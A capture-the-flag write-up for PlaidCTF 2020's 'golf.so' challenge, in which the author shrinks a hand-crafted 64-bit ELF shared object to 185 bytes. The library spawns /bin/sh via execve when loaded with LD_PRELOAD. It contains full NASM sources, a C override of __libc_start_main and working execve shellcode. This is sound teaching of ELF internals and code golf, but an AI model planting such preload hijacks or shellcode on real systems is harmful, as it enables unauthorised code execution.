[Misc] PCTF2020 - golf.so

Golf.so
Solves: 104

Points: 500

Description:
Upload a 64-bit ELF shared object of size at most 1024 bytes. It should spawn a shell (execute execve("/bin/sh", ["/bin/sh"], …)) when used like
LD_PRELOAD=<upload> /bin/true

golf.so.pwni.ng

The objective of this challenge is to create an ELF shared library that spawns a shell when run like this:

$ LD_PRELOAD=<upload> /bin/true

The shared library must also be at most 1024 bytes to pass the first level. The first thing I tried was plain gcc.

First I looked at the /bin/true binary in Ghidra. It exits immediately when it is given fewer than 2 arguments, so our options are to hijack either the entry point or __libc_start_main.

After searching online for the signature of __libc_start_main, I wrote this C file:

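#include <unistd.h> /* execve */

/* Same name as glibc's __libc_start_main, so the preloaded
   definition is picked up instead of the real one. */
int __libc_start_main(
    void *func_ptr,
    int argc,
    char *argv[],
    void (*init_func)(void),
    void (*fini_func)(void),
    void (*rtld_fini_func)(void),
    void *stack_end)
{
    char *args[] = {"/bin/sh", 0x0};
    execve("/bin/sh", args, 0x0);
    return 1; /* only reached if execve fails */
}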

Compiling it using gcc:

$ gcc -shared lol.c -o lol.so
$ LD_PRELOAD=./lol.so /bin/true
$ id
uid=0(root) gid=0(root) groups=0(root)

We got a shell but unfortunately the file is too big:

$ ls -ltah lol.so
-rwxr-xr-x 1 root root 16K Apr 20 10:08 lol.so*

16K is a lot, and we need to find a way to reduce the size. After some reading of the gcc man page and some recommendations online, I tried the following:

  • Disabling RELRO (-Wl,-z,norelro).
  • Stripping the binary (-s).
  • Skipping the start files (-nostartfiles).
  • Skipping the default libraries (-nodefaultlibs).
  • Turning on optimizations with -O3.

This reduced the file size by a considerable amount:

$ gcc -shared -nostartfiles -nodefaultlibs -Wl,-z,norelro -s lol.c -O3
$ ls -ltah a.out
-rwxr-xr-x 1 root root 9.5K Apr 20 10:13 a.out

9.5K was the best I could get with gcc alone, and we need less than 1K. I then found this post online about creating tiny ELF binaries by writing the file by hand in assembly. However, that post targets ELF files of type ET_EXEC and 32-bit, while we need ET_DYN and 64-bit. The possible ELF file types are:

ET_NONE   An unknown type.      (0x0)
ET_REL    A relocatable file.   (0x1)
ET_EXEC   An executable file.   (0x2)
ET_DYN    A shared object.      (0x3)
ET_CORE   A core file.          (0x4)
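
A quick way to check which of these types a file has is to read the 2-byte e_type field at offset 16 of the ELF header. The sketch below is a small Python helper for illustration only; it is not part of the original solution, and the function name elf_type and the hand-built sample header are made up for the example.

```python
import struct

ET_NAMES = {0: "ET_NONE", 1: "ET_REL", 2: "ET_EXEC", 3: "ET_DYN", 4: "ET_CORE"}

def elf_type(data: bytes) -> str:
    """Return the symbolic e_type of an ELF image given its first bytes."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    # e_ident[5] (EI_DATA) is 1 for little-endian, 2 for big-endian.
    fmt = "<H" if data[5] == 1 else ">H"
    (e_type,) = struct.unpack_from(fmt, data, 16)  # e_type follows the 16-byte e_ident
    return ET_NAMES.get(e_type, hex(e_type))

# Hypothetical sample: the e_ident used in this writeup followed by e_type = 3.
sample = b"\x7fELF" + bytes([2, 1, 1, 0]) + bytes(8) + struct.pack("<H", 3)
print(elf_type(sample))  # ET_DYN
```

To inspect a real file, the same function can be called on the first 18 bytes read from disk.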

We want ET_DYN, a shared object. After some searching on GitHub for examples of shared objects written in assembly, I found this template. The search string I used was:

db    0x7f, "ELF" ET_DYN

We can directly modify the code at the _start label, which the DT_INIT entry of the dynamic section points to. To open a shell we need to execute the execve syscall, so we have to set RAX to 0x3b, RDI to a pointer to the string /bin/sh, RSI to a pointer to the array ["/bin/sh", 0x0], and RDX (envp) to zero. My first shellcode was:

_start:
mov rdi,0x68732f6e69622f ; "/bin/sh\0" as a 64-bit little-endian immediate
push rdi ; push the /bin/sh string onto the stack
push rsp ; push the current stack pointer (address of the string)
pop rdi ; RDI = pointer to /bin/sh
push 59 ; push 0x3b (execve syscall number)
pop rax ; RAX = 0x3b
push 0 ; NULL terminator of the argv array
push rdi ; argv[0] = pointer to /bin/sh
mov rsi,rsp ; RSI = pointer to ["/bin/sh",0x0]
cdq ; sign-extend EAX into EDX, which zeroes RDX here (https://www.aldeid.com/wiki/X86-assembly/Instructions/cdq)
syscall ; execve("/bin/sh",["/bin/sh",0x0],0x0)
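
The immediate loaded into RDI is simply the string "/bin/sh" plus its NUL terminator, read as a little-endian 64-bit integer. A short Python check makes that visible (illustrative only; Python is not used in the original solution):

```python
imm = 0x68732F6E69622F  # the immediate from the mov instruction

# x86-64 is little-endian, so the lowest byte ends up first in memory.
raw = imm.to_bytes(8, "little")
print(raw)  # b'/bin/sh\x00'

# The reverse direction: derive the immediate from the string.
derived = int.from_bytes(b"/bin/sh\x00", "little")
print(hex(derived))  # 0x68732f6e69622f
```

Because the string is 7 characters long, the eighth byte of the immediate is zero and doubles as the terminator.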

Putting this code in the template:

; build with:
; nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dq shdr - $$ ; e_shoff (8 bytes)
dd 0 ; e_flags (4 bytes)
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw shentsize ; e_shentsize
dw 2 ; e_shnum
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_paddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align

shdr:
dd 1 ; sh_name
dd 6 ; sh_type = SHT_DYNAMIC
dq 0 ; sh_flags
dq dynsection ; sh_addr
dq dynsection ; sh_offset
dq dynsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 8 ; sh_addralign
dq 7 ; sh_entsize
shentsize equ $ - shdr
dd 0 ; sh_name
dd 3 ; sh_type = SHT_STRTAB
dq 0 ; sh_flags
dq strtab ; sh_addr
dq strtab ; sh_offset
dq strtabsz ; sh_size
dd 0 ; sh_link
dd 0 ; sh_info
dq 0 ; sh_addralign
dq 0 ; sh_entsize
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq 0
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Compiling it:

$ nasm -f bin -o a.out full.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 427 Apr 20 11:28 a.out
$ nasm -f bin -o a.out full.asm
$ LD_PRELOAD=./a.out ./true
$ id
uid=0(root) gid=0(root) groups=0(root)
$ exit

So with this we get a shared object of 427 bytes, less than half of the allowed 1024 bytes. Let's upload it to the site:

You made it to level 1: considerable!
You have 127 bytes left to be thoughtful.
This effort is worthy of 0/2 flags.
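
To see where the 427 bytes go, the sizes of the Elf64 structures can be added up. The sketch below uses Python's struct module with the field layouts of Elf64_Ehdr, Elf64_Phdr, Elf64_Shdr and Elf64_Dyn; the 25-byte shellcode length is my own count of the instruction encodings and should be treated as an assumption.

```python
import struct

# Elf64 structure layouts, little-endian, without padding.
EHDR_FMT = "<16sHHIQQQIHHHHHH"  # Elf64_Ehdr
PHDR_FMT = "<IIQQQQQQ"          # Elf64_Phdr
SHDR_FMT = "<IIQQQQIIQQ"        # Elf64_Shdr
DYN_FMT = "<qQ"                 # Elf64_Dyn (d_tag, d_val)

SHELLCODE_LEN = 25  # assumption: hand-counted size of the first shellcode

parts = {
    "ELF header": struct.calcsize(EHDR_FMT),
    "2 program headers": 2 * struct.calcsize(PHDR_FMT),
    "2 section headers": 2 * struct.calcsize(SHDR_FMT),
    "6 dynamic entries": 6 * struct.calcsize(DYN_FMT),
    "strtab": 2,
    "shellcode": SHELLCODE_LEN,
}

for name, size in parts.items():
    print(f"{name:20} {size:4}")
total = sum(parts.values())
print(f"{'total':20} {total:4}")
```

The two section headers alone account for 128 bytes, which makes them the obvious first thing to cut.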

As expected, this effort is not enough for a flag: we need to save at least 127 more bytes for the first one. What I did next was remove parts of the ELF that are not needed, without breaking the binary. The first thing to go was the section header table (shdr).

It's not really required, so the changes made to full.asm were:

  • e_shoff in the ELF header (ehdr) now points to the program header (phdr)
  • e_shentsize in the ELF header (ehdr) is set to zero
  • e_shnum in the ELF header (ehdr) is set to zero (there are no section headers left because we removed the table completely)

The full cuted.asm:

; build with:
; nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dq phdr - $$ ; e_shoff (changed to phdr instead of shdr)
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
dw 0 ; e_shentsize (changed to 0)
dw 0 ; e_shnum (changed to 0)
dw 1 ; e_shstrndx
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dq dynsection ; p_paddr
dq dynsz ; p_filesz
dq dynsz ; p_memsz
dq 0x1000 ; p_align
; shdr header removed here
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
; DT_STRSZ
dq 0x0a
dq 0
; DT_SYMENT
dq 0x0b
dq 0
; DT_NULL
dq 0x00
dq 0
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

This was enough to get us the first flag:

You made it to level 2: thoughtful! 
You have 75 bytes left to be hand-crafted.
This effort is worthy of 1/2 flags.
PCTF{th0ugh_wE_have_cl1mBed_far_we_MusT_St1ll_c0ntinue_oNward}

Many more improvements are possible from here. For example, the dynamic section has entries we do not need, such as DT_NULL, DT_SYMENT and DT_STRSZ. Removing them saves 48 bytes (three 16-byte entries):

...truncated...
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Compiling it:

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 evilgod evilgod 251 Apr 20 11:58 a.out

We are down to 251 bytes, still far from the 194 needed for the second flag. More can be cut: for example, the last three fields of the ELF header (e_shentsize, e_shnum and e_shstrndx), which all relate to the section header table we already removed.

That saves 6 bytes. To save even more, we can cut the trailing fields of the PT_DYNAMIC entry in the program header (phdr). Fortunately this won't break the library: the entry simply ends up overlapping the dynamic section, which is perfectly fine. The fields removed are p_paddr, p_filesz, p_memsz and p_align.

The assembly file looks like this right now:

; build with:
; nasm elf_dll_x64_template.s -f bin -o template_x64_linux_dll.bin

BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dq phdr - $$ ; e_shoff (changed to phdr instead of shdr)
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0xDEADBEEF ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dq dynsection ; p_offset
dq dynsection ; p_vaddr
dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab
global _start
_start:
;db 0xcc
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Compiling it, we get a file of 213 bytes:

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 213 Apr 20 12:13 a.out
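
The sizes reported so far follow directly from the sizes of the pieces that were removed. As a sanity check, here is a small Python tally (an illustration, not part of the original workflow) that replays each cut from the first 427-byte build:

```python
size = 427  # size of the first hand-written build

steps = [
    ("remove the two section headers (2 x 64)", 2 * 64),
    ("drop DT_STRSZ, DT_SYMENT and DT_NULL (3 x 16)", 3 * 16),
    ("cut e_shentsize, e_shnum and e_shstrndx (3 x 2)", 3 * 2),
    ("cut the four trailing 8-byte fields of PT_DYNAMIC (4 x 8)", 4 * 8),
]

history = [size]
for label, saved in steps:
    size -= saved
    history.append(size)
    print(f"{size:4}  after: {label}")
```

The intermediate values 299, 251 and 213 match the sizes listed by ls after each build.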

That's still not enough for the final flag: we need to save 19 more bytes. The next step was to optimize the shellcode at _start. Some header fields can hold arbitrary values without breaking the binary, so I stored the /bin/sh string in one of them. That way we no longer need to push it onto the stack and juggle pointers, which saves some bytes.

I stored the /bin/sh string in the p_filesz field of the PT_LOAD entry in the program header.
One thing that helped a lot while debugging the shellcode was putting an int 3 instruction before it. It raises SIGTRAP, so gdb stops there as if it were a breakpoint. Since I wasn't able to break at the entry point otherwise, this made debugging much easier:

_start:
db 0xcc ; SIGTRAP (int 3 instruction)
mov rdi,0x68732f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Now let's change the p_filesz field to hold the /bin/sh string:

...
phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0x68732f6e69622f ; p_filesz (now has /bin/sh here)
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
...

We also need the runtime address of this field. Like libc, this is a shared library, so the loader maps it at an address chosen at load time. Luckily, when our entry code starts executing, RAX already holds a pointer into the mapped library, so we can work out the offset from there using gdb:

pwndbg> set environment LD_PRELOAD ./a.out
pwndbg> r

The address present in rax:

[Screenshot: pwndbg register view showing rax]

We can then verify where the /bin/sh string is located with:

pwndbg> x/s $rax-0x62
0x7fff194f205a: "/bin/sh"
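
The 0x62 can be cross-checked against the file layout. The sketch below (Python, for illustration only) recomputes the file offsets of the p_filesz field and of _start for the 213-byte layout, using the Elf64 field sizes. The difference comes out as exactly 0x62, which suggests that RAX held the address of _start itself in this run. That reading is an inference from the arithmetic, not something the loader is documented to guarantee.

```python
EHDR = 64 - 6                        # ELF header with its last three 2-byte fields cut
PHDR = 56                            # one full Elf64_Phdr (the PT_LOAD entry)
PT_DYNAMIC_KEPT = 4 + 4 + 8 + 8      # p_type, p_flags, p_offset, p_vaddr
DYN = 3 * 16                         # DT_INIT, DT_STRTAB, DT_SYMTAB
STRTAB = 2                           # the two db 0 bytes

P_FILESZ_IN_PHDR = 4 + 4 + 8 + 8 + 8  # fields preceding p_filesz inside a phdr

binsh_offset = EHDR + P_FILESZ_IN_PHDR
start_offset = EHDR + PHDR + PT_DYNAMIC_KEPT + DYN + STRTAB
delta = start_offset - binsh_offset

print(hex(binsh_offset), hex(start_offset), hex(delta))  # 0x5a 0xbc 0x62
```

The 0x5a also agrees with the low bits of the address printed by x/s above, which ends in 05a.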

After this we can use the lea instruction to get the address of /bin/sh directly, which saves a lot of bytes:

_start:
lea rdi,[rax-0x62]
push 59
pop rax
push 0
push rdi
mov rsi,rsp
cdq
syscall

Let's check the size now:

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 204 Apr 20 12:46 a.out

We also don't need to reserve space for strtab, so DT_STRTAB and DT_SYMTAB can point to _start instead of a separate label holding two db bytes.

Updating the script from:

dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq strtab
; DT_SYMTAB
dq 0x06
dq strtab
dynsz equ $ - dynsection

strtab:
db 0
db 0
strtabsz equ $ - strtab

To:

dynsection:
; DT_INIT
dq 0x0c
dq _start
; DT_STRTAB
dq 0x05
dq _start
; DT_SYMTAB
dq 0x06
dq _start
dynsz equ $ - dynsection

Two bytes are now saved:

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 202 Apr 20 12:49 a.out

One final tweak is needed to reach the final flag. What I did in the end was overlap the dynamic section with the PT_DYNAMIC entry of the program header. We can control the p_offset field without breaking the ELF, so p_offset and p_vaddr together double as a fake DT_STRTAB entry (tag 0x5). The dynamic section now starts inside the program header and the old standalone DT_STRTAB entry is removed, which saves 0x10 bytes.

Because _start moves, the offset used in _start must be updated as well (to 0x50).
My final payload was:

BITS 64
org 0
ehdr:
db 0x7f, "ELF", 2, 1, 1, 0 ; e_ident
db 0, 0, 0, 0, 0, 0, 0, 0
dw 3 ; e_type = ET_DYN
dw 62 ; e_machine = EM_X86_64
dd 1 ; e_version = EV_CURRENT
dq _start ; e_entry = _start
dq phdr - $$ ; e_phoff
dq phdr - $$ ; e_shoff (changed to phdr instead of shdr)
dd 0 ; e_flags
dw ehdrsize ; e_ehsize
dw phdrsize ; e_phentsize
dw 2 ; e_phnum
ehdrsize equ $ - ehdr

phdr:
dd 1 ; p_type = PT_LOAD
dd 7 ; p_flags = rwx
dq 0 ; p_offset
dq $$ ; p_vaddr
dq $$ ; p_paddr
dq 0x68732f6e69622f ; p_filesz
dq 0xDEADBEEF ; p_memsz
dq 0x1000 ; p_align
phdrsize equ $ - phdr
dd 2 ; p_type = PT_DYNAMIC
dd 7 ; p_flags = rwx
dynsection:
; DT_STRTAB
dq 0x5 ; p_offset (OVERLAPPED)
dq dynsection ; p_vaddr
; DT_INIT
dq 0x0c
dq _start
; DT_SYMTAB
dq 0x06
dq _start
global _start
_start:
lea rdi,[rax-0x50]
push 59
pop rax
push 0
push rdi
mov rsi,rsp
;cdq ; may be needed locally, but the website accepts the file without it (saves 1 byte)
syscall

We get a file of 185 bytes :) which is more than enough for the final flag:

$ nasm -f bin -o a.out cuted.asm
$ ls -ltah a.out
-rw-r--r-- 1 root root 185 Apr 20 12:57 a.out
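
To make the overlap easier to see, the final layout can be rebuilt byte by byte in Python and the PT_DYNAMIC entry parsed back as a full program header. This is only a sketch: the machine-code bytes are my own hand-assembly of the listing above (an assumption, not nasm output), and the constants START and DYNSECTION are the file offsets I computed for the _start and dynsection labels.

```python
import struct

START = 0xAA       # assumed file offset of _start
DYNSECTION = 0x7A  # assumed file offset of dynsection

ehdr = struct.pack(
    "<16sHHIQQQIHHH",
    b"\x7fELF" + bytes([2, 1, 1, 0]),  # e_ident, zero-padded to 16 bytes by struct
    3, 62, 1,                          # e_type = ET_DYN, e_machine, e_version
    START,                             # e_entry
    58,                                # e_phoff: phdr follows the truncated header
    58, 0,                             # e_shoff, e_flags
    58, 56, 2,                         # e_ehsize, e_phentsize, e_phnum
)
load_phdr = struct.pack(
    "<IIQQQQQQ", 1, 7, 0, 0, 0, 0x68732F6E69622F, 0xDEADBEEF, 0x1000
)
dyn_phdr_head = struct.pack("<II", 2, 7)  # p_type = PT_DYNAMIC, p_flags
dynamic = struct.pack("<6Q", 5, DYNSECTION, 0x0C, START, 6, START)

# lea rdi,[rax-0x50]; push 59; pop rax; push 0; push rdi; mov rsi,rsp; syscall
code = bytes.fromhex("488d78b0" "6a3b" "58" "6a00" "57" "4889e6" "0f05")

image = ehdr + load_phdr + dyn_phdr_head + dynamic + code
binsh_at = image.index(b"/bin/sh\x00")

# Read PT_DYNAMIC as a full 56-byte phdr: its tail is the dynamic section itself.
pt_dynamic = struct.unpack_from("<IIQQQQQQ", image, len(ehdr) + len(load_phdr))

print(len(image), hex(binsh_at), hex(START - binsh_at))
print([hex(v) for v in pt_dynamic])
```

Under these assumptions the image is 185 bytes long, the string sits at offset 0x5a, and _start is 0x50 bytes after it, which matches the lea in the payload. The parsed entry shows p_offset = 5 and p_vaddr = dynsection acting as the DT_STRTAB entry, while the remaining phdr fields are just the DT_INIT and DT_SYMTAB entries.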

The flags were:

You made it to level 5: record-breaking! You have 9 bytes left to be astounding.
This effort is worthy of 2/2 flags.
PCTF{th0ugh_wE_have_cl1mBed_far_we_MusT_St1ll_c0ntinue_oNward}
PCTF{t0_get_a_t1ny_elf_we_5tick_1ts_hand5_in_its_ears_rtmlpntyea}